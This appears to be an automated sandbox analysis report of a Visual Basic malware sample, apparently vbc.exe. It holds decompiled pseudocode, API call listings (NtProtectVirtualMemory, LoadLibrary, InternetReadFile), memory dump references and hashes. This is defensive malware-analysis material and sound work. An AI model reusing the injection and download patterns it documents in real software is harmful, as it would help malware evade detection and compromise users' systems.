                    0x0040bdd6
                    0x0040bdd8
                    0x0040bdda
                    0x0040bde4
                    0x0040bdeb
                    0x0040bdf0
                    0x00000000

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                    • HideCaret.USER32(?), ref: 0040BDBC
                    • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                    • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                    • String ID:
                    • API String ID: 2961917346-0
                    • Opcode ID: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                    • Instruction ID: 4b25c979fca95e85091d665f10c397e12c70c7e34684666f5dd652a0ccf7a8f1
                    • Opcode Fuzzy Hash: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                    • Instruction Fuzzy Hash: E4113A74900688EFCB01AFA5CC45B9DBBB5FF08745F10806AF541BA1E1C7789A45CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040BD46, Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E0040BD46(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _t34;
				short _t36;
				void* _t38;
				void* _t45;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t38 = __ecx;
				asm("in al, dx");
				_t48 = _t47 - 0xc;
				 *[fs:0x0] = _t48;
				L00401120();
				 *((intOrPtr*)(_t45 - 0xc)) = _t48;
				 *((intOrPtr*)(_t45 - 8)) = E004010B0;
				 *((intOrPtr*)(_t45 - 4)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 4))( *((intOrPtr*)(_t45 + 8)), __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126);
				_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 0x58))( *((intOrPtr*)(_t45 + 8)), _t45 - 0x40);
				asm("fclex");
				 *(_t45 - 0x44) = _t34;
				if( *(_t45 - 0x44) >= 0) {
					 *(_t45 - 0x50) =  *(_t45 - 0x50) & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4020d4);
					_push( *((intOrPtr*)(_t45 + 8)));
					_push( *(_t45 - 0x44));
					L004011F2();
					 *(_t45 - 0x50) = _t34;
				}
				HideCaret( *(_t45 - 0x40));
				L004011EC();
				_push(0);
				_t36 =  *0x004039FF();
				_t46 = _t45 + 1;
				asm("aam 0xa");
				 *_t36 =  *_t36 + _t36;
				 *((intOrPtr*)(_t46 - 0x17af2bbb)) =  *((intOrPtr*)(_t46 - 0x17af2bbb)) + _t38;
				 *((short*)(_t46 - 0x1c)) = _t36;
				L004011E0();
				_push(E0040BE01);
				return _t36;
			}










                    0x0040bd46
                    0x0040bd46
                    0x0040bd47
                    0x0040bd56
                    0x0040bd60
                    0x0040bd68
                    0x0040bd6b
                    0x0040bd72
                    0x0040bd81
                    0x0040bd90
                    0x0040bd93
                    0x0040bd95
                    0x0040bd9c
                    0x0040bdb5
                    0x0040bd9e
                    0x0040bd9e
                    0x0040bda0
                    0x0040bda5
                    0x0040bda8
                    0x0040bdab
                    0x0040bdb0
                    0x0040bdb0
                    0x0040bdbc
                    0x0040bdc1
                    0x0040bdcb
                    0x0040bdd3
                    0x0040bdd5
                    0x0040bdd6
                    0x0040bdd8
                    0x0040bdda
                    0x0040bde4
                    0x0040bdeb
                    0x0040bdf0
                    0x00000000

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                    • HideCaret.USER32(?), ref: 0040BDBC
                    • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                    • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                    • String ID:
                    • API String ID: 2961917346-0
                    • Opcode ID: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                    • Instruction ID: 66d8ca1993ac17da8515e34f646b0e7e8b9bd3e58b8d3ce0fd8b4448664758be
                    • Opcode Fuzzy Hash: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                    • Instruction Fuzzy Hash: 25114934900688EFCB01AFA4CC45B9DBFB5EF08744F10806AF641BA1A1C7789A46CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C261, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 60%
                    			E0040C261(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v32;
				signed int _v40;
				signed int _t20;
				void* _t28;
				intOrPtr _t30;

				 *[fs:0x0] = _t30;
				L00401120();
				_v12 = _t30;
				_v8 = 0x401108;
				L004011DA();
				_t20 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401126, __ecx, __ecx, _t28);
				asm("fclex");
				_v32 = _t20;
				if(_v32 >= 0) {
					_v40 = _v40 & 0x00000000;
				} else {
					_push(0x14c);
					_push(0x4020d4);
					_push(_a4);
					_push(_v32);
					L004011F2();
					_v40 = _t20;
				}
				_push(E0040C2E0);
				L004011B0();
				return _t20;
			}











                    0x0040c272
                    0x0040c27c
                    0x0040c284
                    0x0040c287
                    0x0040c294
                    0x0040c2a3
                    0x0040c2a9
                    0x0040c2ab
                    0x0040c2b2
                    0x0040c2ce
                    0x0040c2b4
                    0x0040c2b4
                    0x0040c2b9
                    0x0040c2be
                    0x0040c2c1
                    0x0040c2c4
                    0x0040c2c9
                    0x0040c2c9
                    0x0040c2d2
                    0x0040c2da
                    0x0040c2df

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C27C
                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401126), ref: 0040C294
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020D4,0000014C,?,?,?,?,00401126), ref: 0040C2C4
                    • __vbaFreeStr.MSVBVM60(0040C2E0,?,?,?,?,?,?,00401126), ref: 0040C2DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp Download File
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __vba$CheckChkstkCopyFreeHresult
                    • String ID:
                    • API String ID: 3646427762-0
                    • Opcode ID: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                    • Instruction ID: e6314aaefe9858c2768dfea9a20980395283ff53a00ce7bf66a0ac0bf510db14
                    • Opcode Fuzzy Hash: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                    • Instruction Fuzzy Hash: 6E011A70940209EFCB04DF95C946FAE7BB4EB08754F10416AF6057A5E0C3B95A01DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Analysis Process: vbc.exe PID: 2868 Parent PID: 2692 vbc.exeCOMMON

                    Executed Functions

                    Function 001B5435, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 653COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryProtectVirtual
                    • String ID: y
                    • API String ID: 3389902171-1128323793
                    • Opcode ID: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                    • Instruction ID: b5a1c13f13509c146d0012a6ae06c69a599a2323081684cb58adc98df93dfcfc
                    • Opcode Fuzzy Hash: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                    • Instruction Fuzzy Hash: CA225A70640301EFEF219F24CDD4BEA77A3AF26360F658229ED958B2D6D37588858712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B5F9F, Relevance: 1.7, APIs: 1, Instructions: 162filenetworkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction ID: f1526dd3d22c9a5b7326bf5fd8f01987d308a936f4a6ffc2fe4fa24faa1ef35d
                    • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction Fuzzy Hash: 99417A35204306CEEB296D38C9A47F67793BF76320FAA5139D886875A5E37C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 001B5A6C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,001B5609,00000040), ref: 001B5A87
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                    • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E98F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1E9900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp Download File
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp Download File
